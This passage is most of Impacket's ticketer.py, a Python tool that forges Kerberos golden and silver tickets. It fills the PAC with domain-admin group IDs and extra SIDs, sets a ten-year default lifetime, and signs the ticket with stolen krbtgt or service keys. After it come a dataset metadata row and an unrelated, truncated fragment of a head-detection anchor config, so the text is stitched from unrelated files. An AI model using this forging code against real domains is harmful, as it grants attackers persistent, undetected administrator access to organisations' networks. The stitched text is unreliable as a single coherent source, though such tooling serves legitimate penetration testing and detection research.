kerbdata['PasswordLastSet']['dwHighDateTime'] = unixTime >> 32
kerbdata['PasswordCanChange']['dwLowDateTime'] = 0
kerbdata['PasswordCanChange']['dwHighDateTime'] = 0
# PasswordMustChange: A FILETIME structure that contains the time at which
# theclient's password expires. If the password will not expire, this
# structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the
# dwLowDateTime member set to 0xFFFFFFFF.
kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF
kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF
kerbdata['EffectiveName'] = self.__target
kerbdata['FullName'] = ''
kerbdata['LogonScript'] = ''
kerbdata['ProfilePath'] = ''
kerbdata['HomeDirectory'] = ''
kerbdata['HomeDirectoryDrive'] = ''
kerbdata['LogonCount'] = 500
kerbdata['BadPasswordCount'] = 0
kerbdata['UserId'] = int(self.__options.user_id)
kerbdata['PrimaryGroupId'] = 513
# Our Golden Well-known groups! :)
groups = self.__options.groups.split(',')
kerbdata['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
kerbdata['GroupIds'].append(groupMembership)
kerbdata['UserFlags'] = 0
kerbdata['UserSessionKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['LogonServer'] = ''
kerbdata['LogonDomainName'] = self.__domain.upper()
kerbdata['LogonDomainId'].fromCanonical(self.__options.domain_sid)
kerbdata['LMKey'] = b'\x00\x00\x00\x00\x00\x00\x00\x00'
kerbdata['UserAccountControl'] = USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD
kerbdata['SubAuthStatus'] = 0
kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0
kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0
kerbdata['LastFailedILogon']['dwLowDateTime'] = 0
kerbdata['LastFailedILogon']['dwHighDateTime'] = 0
kerbdata['FailedILogonCount'] = 0
kerbdata['Reserved3'] = 0
kerbdata['ResourceGroupDomainSid'] = NULL
kerbdata['ResourceGroupCount'] = 0
kerbdata['ResourceGroupIds'] = NULL
validationInfo = VALIDATION_INFO()
validationInfo['Data'] = kerbdata
return validationInfo
def createBasicPac(self, kdcRep):
validationInfo = self.createBasicValidationInfo()
pacInfos = {}
pacInfos[PAC_LOGON_INFO] = validationInfo.getData() + validationInfo.getDataReferents()
srvCheckSum = PAC_SIGNATURE_DATA()
privCheckSum = PAC_SIGNATURE_DATA()
if kdcRep['ticket']['enc-part']['etype'] == EncryptionTypes.rc4_hmac.value:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_md5.value
srvCheckSum['Signature'] = b'\x00' * 16
privCheckSum['Signature'] = b'\x00' * 16
else:
srvCheckSum['Signature'] = b'\x00' * 12
privCheckSum['Signature'] = b'\x00' * 12
if len(self.__options.aesKey) == 64:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes256.value
else:
srvCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
privCheckSum['SignatureType'] = ChecksumTypes.hmac_sha1_96_aes128.value
pacInfos[PAC_SERVER_CHECKSUM] = srvCheckSum.getData()
pacInfos[PAC_PRIVSVR_CHECKSUM] = privCheckSum.getData()
clientInfo = PAC_CLIENT_INFO()
clientInfo['Name'] = self.__target.encode('utf-16le')
clientInfo['NameLength'] = len(clientInfo['Name'])
pacInfos[PAC_CLIENT_INFO_TYPE] = clientInfo.getData()
return pacInfos
def createBasicTicket(self):
if self.__options.request is True:
if self.__domain == self.__server:
logging.info('Requesting TGT to target domain to use as basis')
else:
logging.info('Requesting TGT/TGS to target domain to use as basis')
if self.__options.hashes is not None:
lmhash, nthash = self.__options.hashes.split(':')
else:
lmhash = ''
nthash = ''
userName = Principal(self.__options.user, type=PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(lmhash), unhexlify(nthash), None,
self.__options.dc_ip)
if self.__domain == self.__server:
kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
else:
serverName = Principal(self.__options.spn, type=PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain, None, tgt, cipher,
sessionKey)
kdcRep = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# Let's check we have all the necessary data based on the ciphers used. Boring checks
ticketCipher = int(kdcRep['ticket']['enc-part']['etype'])
encPartCipher = int(kdcRep['enc-part']['etype'])
if (ticketCipher == EncryptionTypes.rc4_hmac.value or encPartCipher == EncryptionTypes.rc4_hmac.value) and \
self.__options.nthash is None:
logging.critical('rc4_hmac is used in this ticket and you haven\'t specified the -nthash parameter. '
'Can\'t continue ( or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
self.__options.aesKey is None:
logging.critical(
'aes128_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes128_cts_hmac_sha1_96.value) and \
self.__options.aesKey is not None and len(self.__options.aesKey) > 32:
logging.critical(
'aes128_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes128. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
if (ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and self.__options.aesKey is None:
logging.critical(
'aes256_cts_hmac_sha1_96 is used in this ticket and you haven\'t specified the -aesKey parameter. '
'Can\'t continue (or try running again w/o the -request option)')
return None, None
if ( ticketCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value or
encPartCipher == EncryptionTypes.aes256_cts_hmac_sha1_96.value) and \
self.__options.aesKey is not None and len(self.__options.aesKey) < 64:
logging.critical(
'aes256_cts_hmac_sha1_96 is used in this ticket and the -aesKey you specified is not aes256. '
'Can\'t continue')
return None, None
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = self.__target
else:
logging.info('Creating basic skeleton ticket and PAC Infos')
if self.__domain == self.__server:
kdcRep = AS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.AS_REP.value
else:
kdcRep = TGS_REP()
kdcRep['msg-type'] = ApplicationTagNumbers.TGS_REP.value
kdcRep['pvno'] = 5
if self.__options.nthash is None:
kdcRep['padata'] = noValue
kdcRep['padata'][0] = noValue
kdcRep['padata'][0]['padata-type'] = PreAuthenticationDataTypes.PA_ETYPE_INFO2.value
etype2 = ETYPE_INFO2()
etype2[0] = noValue
if len(self.__options.aesKey) == 64:
etype2[0]['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
etype2[0]['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
etype2[0]['salt'] = '%s%s' % (self.__domain.upper(), self.__target)
encodedEtype2 = encoder.encode(etype2)
kdcRep['padata'][0]['padata-value'] = encodedEtype2
kdcRep['crealm'] = self.__domain.upper()
kdcRep['cname'] = noValue
kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['cname']['name-string'] = noValue
kdcRep['cname']['name-string'][0] = self.__target
kdcRep['ticket'] = noValue
kdcRep['ticket']['tkt-vno'] = ProtocolVersionNumber.pvno.value
kdcRep['ticket']['realm'] = self.__domain.upper()
kdcRep['ticket']['sname'] = noValue
kdcRep['ticket']['sname']['name-string'] = noValue
kdcRep['ticket']['sname']['name-string'][0] = self.__service
if self.__domain == self.__server:
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
kdcRep['ticket']['sname']['name-string'][1] = self.__domain.upper()
else:
kdcRep['ticket']['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
kdcRep['ticket']['sname']['name-string'][1] = self.__server
kdcRep['ticket']['enc-part'] = noValue
kdcRep['ticket']['enc-part']['kvno'] = 2
kdcRep['enc-part'] = noValue
if self.__options.nthash is None:
if len(self.__options.aesKey) == 64:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes256_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
kdcRep['enc-part']['etype'] = EncryptionTypes.aes128_cts_hmac_sha1_96.value
else:
kdcRep['ticket']['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['etype'] = EncryptionTypes.rc4_hmac.value
kdcRep['enc-part']['kvno'] = 2
kdcRep['enc-part']['cipher'] = noValue
pacInfos = self.createBasicPac(kdcRep)
return kdcRep, pacInfos
def customizeTicket(self, kdcRep, pacInfos):
logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target))
encTicketPart = EncTicketPart()
flags = list()
flags.append(TicketFlags.forwardable.value)
flags.append(TicketFlags.proxiable.value)
flags.append(TicketFlags.renewable.value)
if self.__domain == self.__server:
flags.append(TicketFlags.initial.value)
flags.append(TicketFlags.pre_authent.value)
encTicketPart['flags'] = encodeFlags(flags)
encTicketPart['key'] = noValue
encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
else:
encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
encTicketPart['crealm'] = self.__domain.upper()
encTicketPart['cname'] = noValue
encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encTicketPart['cname']['name-string'] = noValue
encTicketPart['cname']['name-string'][0] = self.__target
encTicketPart['transited'] = noValue
encTicketPart['transited']['tr-type'] = 0
encTicketPart['transited']['contents'] = ''
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
# Let's extend the ticket's validity a lil bit
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
encTicketPart['authorization-data'] = noValue
encTicketPart['authorization-data'][0] = noValue
encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
encTicketPart['authorization-data'][0]['ad-data'] = noValue
# Let's locate the KERB_VALIDATION_INFO and Checksums
if PAC_LOGON_INFO in pacInfos:
data = pacInfos[PAC_LOGON_INFO]
validationInfo = VALIDATION_INFO()
validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
lenVal = len(validationInfo.getData())
validationInfo.fromStringReferents(data, lenVal)
aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
unixTime = self.getFileTime(aTime)
kerbdata = KERB_VALIDATION_INFO()
kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
# Let's adjust username and other data
validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
validationInfo['Data']['EffectiveName'] = self.__target
# Our Golden Well-known groups! :)
groups = self.__options.groups.split(',')
validationInfo['Data']['GroupIds'] = list()
validationInfo['Data']['GroupCount'] = len(groups)
for group in groups:
groupMembership = GROUP_MEMBERSHIP()
groupId = NDRULONG()
groupId['Data'] = int(group)
groupMembership['RelativeId'] = groupId
groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
validationInfo['Data']['GroupIds'].append(groupMembership)
# Let's add the extraSid
if self.__options.extra_sid is not None:
extrasids = self.__options.extra_sid.split(',')
if validationInfo['Data']['SidCount'] == 0:
# Let's be sure user's flag specify we have extra sids.
validationInfo['Data']['UserFlags'] |= 0x20
validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
for extrasid in extrasids:
validationInfo['Data']['SidCount'] += 1
sidRecord = KERB_SID_AND_ATTRIBUTES()
sid = RPC_SID()
sid.fromCanonical(extrasid)
sidRecord['Sid'] = sid
sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
# And, let's append the magicSid
validationInfo['Data']['ExtraSids'].append(sidRecord)
else:
validationInfo['Data']['ExtraSids'] = NULL
validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents()
pacInfos[PAC_LOGON_INFO] = validationInfoBlob
if logging.getLogger().level == logging.DEBUG:
logging.debug('VALIDATION_INFO after making it gold')
validationInfo.dump()
print ('\n')
else:
raise Exception('PAC_LOGON_INFO not found! Aborting')
logging.info('\tPAC_LOGON_INFO')
# Let's now clear the checksums
if PAC_SERVER_CHECKSUM in pacInfos:
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
serverChecksum['Signature'] = '\x00' * 12
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
serverChecksum['Signature'] = '\x00' * 12
else:
serverChecksum['Signature'] = '\x00' * 16
pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
else:
raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
if PAC_PRIVSVR_CHECKSUM in pacInfos:
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksum['Signature'] = '\x00' * 12
if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
privSvrChecksum['Signature'] = '\x00' * 12
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
privSvrChecksum['Signature'] = '\x00' * 12
else:
privSvrChecksum['Signature'] = '\x00' * 16
pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
else:
raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
if PAC_CLIENT_INFO_TYPE in pacInfos:
pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
pacClientInfo['ClientId'] = unixTime
pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
else:
raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
logging.info('\tPAC_CLIENT_INFO_TYPE')
logging.info('\tEncTicketPart')
if self.__domain == self.__server:
encRepPart = EncASRepPart()
else:
encRepPart = EncTGSRepPart()
encRepPart['key'] = noValue
encRepPart['key']['keytype'] = encTicketPart['key']['keytype']
encRepPart['key']['keyvalue'] = encTicketPart['key']['keyvalue']
encRepPart['last-req'] = noValue
encRepPart['last-req'][0] = noValue
encRepPart['last-req'][0]['lr-type'] = 0
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
encRepPart['nonce'] = 123456789
encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
encRepPart['flags'] = encodeFlags(flags)
encRepPart['authtime'] = str(encTicketPart['authtime'])
encRepPart['endtime'] = str(encTicketPart['endtime'])
encRepPart['starttime'] = str(encTicketPart['starttime'])
encRepPart['renew-till'] = str(encTicketPart['renew-till'])
encRepPart['srealm'] = self.__domain.upper()
encRepPart['sname'] = noValue
encRepPart['sname']['name-string'] = noValue
encRepPart['sname']['name-string'][0] = self.__service
if self.__domain == self.__server:
encRepPart['sname']['name-type'] = PrincipalNameType.NT_SRV_INST.value
encRepPart['sname']['name-string'][1] = self.__domain.upper()
logging.info('\tEncAsRepPart')
else:
encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
encRepPart['sname']['name-string'][1] = self.__server
logging.info('\tEncTGSRepPart')
return encRepPart, encTicketPart, pacInfos
def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
logging.info('Signing/Encrypting final ticket')
# We changed everything we needed to make us special. Now let's repack and calculate checksums
validationInfoBlob = pacInfos[PAC_LOGON_INFO]
validationInfoAlignment = b'\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob))
pacClientInfoBlob = pacInfos[PAC_CLIENT_INFO_TYPE]
pacClientInfoAlignment = b'\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))
serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM]
serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))
privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM]
privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))
# The offset are set from the beginning of the PAC_TYPE
# [MS-PAC] 2.4 PAC_INFO_BUFFER
offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4
# Let's build the PAC_INFO_BUFFER for each one of the elements
validationInfoIB = PAC_INFO_BUFFER()
validationInfoIB['ulType'] = PAC_LOGON_INFO
validationInfoIB['cbBufferSize'] = len(validationInfoBlob)
validationInfoIB['Offset'] = offsetData
offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8
pacClientInfoIB = PAC_INFO_BUFFER()
pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE
pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)
pacClientInfoIB['Offset'] = offsetData
offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8
serverChecksumIB = PAC_INFO_BUFFER()
serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM
serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)
serverChecksumIB['Offset'] = offsetData
offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8
privSvrChecksumIB = PAC_INFO_BUFFER()
privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM
privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)
privSvrChecksumIB['Offset'] = offsetData
# offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8
# Building the PAC_TYPE as specified in [MS-PAC]
buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \
privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \
pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment
buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
pacType = PACTYPE()
pacType['cBuffers'] = 4
pacType['Version'] = 0
pacType['Buffers'] = buffers + buffersTail
blobToChecksum = pacType.getData()
checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']]
if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType'])
checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']]
if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey))
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey))
elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value:
keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash))
else:
raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType'])
serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum)
logging.info('\tPAC_SERVER_CHECKSUM')
privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature'])
logging.info('\tPAC_PRIVSVR_CHECKSUM')
buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment
pacType['Buffers'] = buffers + buffersTail
authorizationData = AuthorizationData()
authorizationData[0] = noValue
authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value
authorizationData[0]['ad-data'] = pacType.getData()
authorizationData = encoder.encode(authorizationData)
encTicketPart['authorization-data'][0]['ad-data'] = authorizationData
if logging.getLogger().level == logging.DEBUG:
logging.debug('Customized EncTicketPart')
print(encTicketPart.prettyPrint())
print ('\n')
encodedEncTicketPart = encoder.encode(encTicketPart)
cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']]
if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
key = Key(cipher.enctype, unhexlify(self.__options.aesKey))
elif cipher.enctype == EncryptionTypes.rc4_hmac.value:
key = Key(cipher.enctype, unhexlify(self.__options.nthash))
else:
raise Exception('Unsupported enctype 0x%x' % cipher.enctype)
# Key Usage 2
# AS-REP Ticket and TGS-REP Ticket (includes TGS session
# key or application session key), encrypted with the
# service key (Section 5.3)
logging.info('\tEncTicketPart')
cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None)
kdcRep['ticket']['enc-part']['cipher'] = cipherText
kdcRep['ticket']['enc-part']['kvno'] = 2
# Lastly.. we have to encrypt the kdcRep['enc-part'] part
# with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?)
encodedEncASRepPart = encoder.encode(encASorTGSRepPart)
if self.__domain == self.__server:
# Key Usage 3
# AS-REP encrypted part (includes TGS session key or
# application session key), encrypted with the client key
# (Section 5.4.2)
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncASRepPart')
cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None)
else:
# Key Usage 8
# TGS-REP encrypted part (includes application session
# key), encrypted with the TGS session key
# (Section 5.4.2)
sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets())
logging.info('\tEncTGSRepPart')
cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None)
kdcRep['enc-part']['cipher'] = cipherText
kdcRep['enc-part']['etype'] = cipher.enctype
kdcRep['enc-part']['kvno'] = 1
if logging.getLogger().level == logging.DEBUG:
logging.debug('Final Golden Ticket')
print(kdcRep.prettyPrint())
print ('\n')
return encoder.encode(kdcRep), cipher, sessionKey
def saveTicket(self, ticket, sessionKey):
logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache'))
from impacket.krb5.ccache import CCache
ccache = CCache()
if self.__server == self.__domain:
ccache.fromTGT(ticket, sessionKey, sessionKey)
else:
ccache.fromTGS(ticket, sessionKey, sessionKey)
ccache.saveFile(self.__target.replace('/','.') + '.ccache')
def run(self):
ticket, adIfRelevant = self.createBasicTicket()
if ticket is not None:
encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant)
ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos)
self.saveTicket(ticket, sessionKey)
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help=True, description="Creates a Kerberos golden/silver tickets based on "
"user options")
parser.add_argument('target', action='store', help='username for the newly created ticket')
parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the silver ticket will'
' be generated for. if omitted, golden ticket will be created')
parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it '
'changing only the supplied information. It requires specifying -user')
parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)')
parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticker will be '
'generated for')
parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key used for signing the ticket '
'(128 or 256 bits)')
parser.add_argument('-nthash', action="store", help='NT hash used for signing the ticket')
parser.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file (silver ticket only)')
parser.add_argument('-groups', action="store", default = '513, 512, 520, 518, 519', help='comma separated list of '
'groups user will belong to (default = 513, 512, 520, 518, 519)')
parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be '
'created for (default = 500)')
parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC')
parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires '
'(default = 365*10)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-user', action="store", help='domain/username to be used if -request is chosen (it can be '
'different from domain/username')
group.add_argument('-password', action="store", help='password for domain/username')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
print("\nExamples: ")
print("\t./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser\n")
print("\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.")
print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256")
print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as")
print("\tbaduser.ccache.\n")
print("\t./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain "
"<your domain FQDN> -request -user <a valid domain user> -password <valid domain user's password> baduser\n")
print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used")
print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,")
print("\thence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'")
print("\tand saved as baduser.ccache")
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
if options.domain is None:
logging.critical('Domain should be specified!')
sys.exit(1)
if options.aesKey is None and options.nthash is None and options.keytab is None:
logging.error('You have to specify either aesKey, or nthash, or keytab')
sys.exit(1)
if options.aesKey is not None and options.nthash is not None and options.request is False:
logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one')
sys.exit(1)
if options.request is True and options.user is None:
logging.error('-request parameter needs -user to be specified')
sys.exit(1)
if options.request is True and options.hashes is None and options.password is None:
from getpass import getpass
password = getpass("Password:")
else:
password = options.password
try:
executer = TICKETER(options.target, password, options.domain, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
print(str(e))
| 52.053856 | 141 | 0.643882 |
29e974af201dcee8b38bb970fb7ac08a747999f9 | 794 | py | Python | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 60 | 2021-06-20T06:17:30.000Z | 2022-03-30T03:04:48.000Z | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 21 | 2021-06-21T09:39:27.000Z | 2022-02-07T22:41:43.000Z | head_detection/data/anchors.py | eplatero97/HeadHunter | f72ef06263a530102b3de1894f94d65255aecb37 | [
"MIT"
] | 16 | 2021-06-22T03:07:06.000Z | 2022-01-18T16:52:05.000Z | #!/usr/bin/env python
# coding: utf-8
shead_anchors = ((18,), (36,), (72,),
(128,), (208,), (320,),
(512,), (768,))
chuman_anchors = ((10,), (48,), (128,), (192,), (256,), (320,), (512,))
comb_anchors = ((12,), (32,), (64,), (112,), (196, ), (256,), (384,), (512,))
hh_anchors = ((12,), (18,), (24,), (32,), (48, ), (64,), (128,))
sh_anchors = {'anchor_sizes' : shead_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(shead_anchors)}
ch_anchors = {'anchor_sizes' : chuman_anchors,
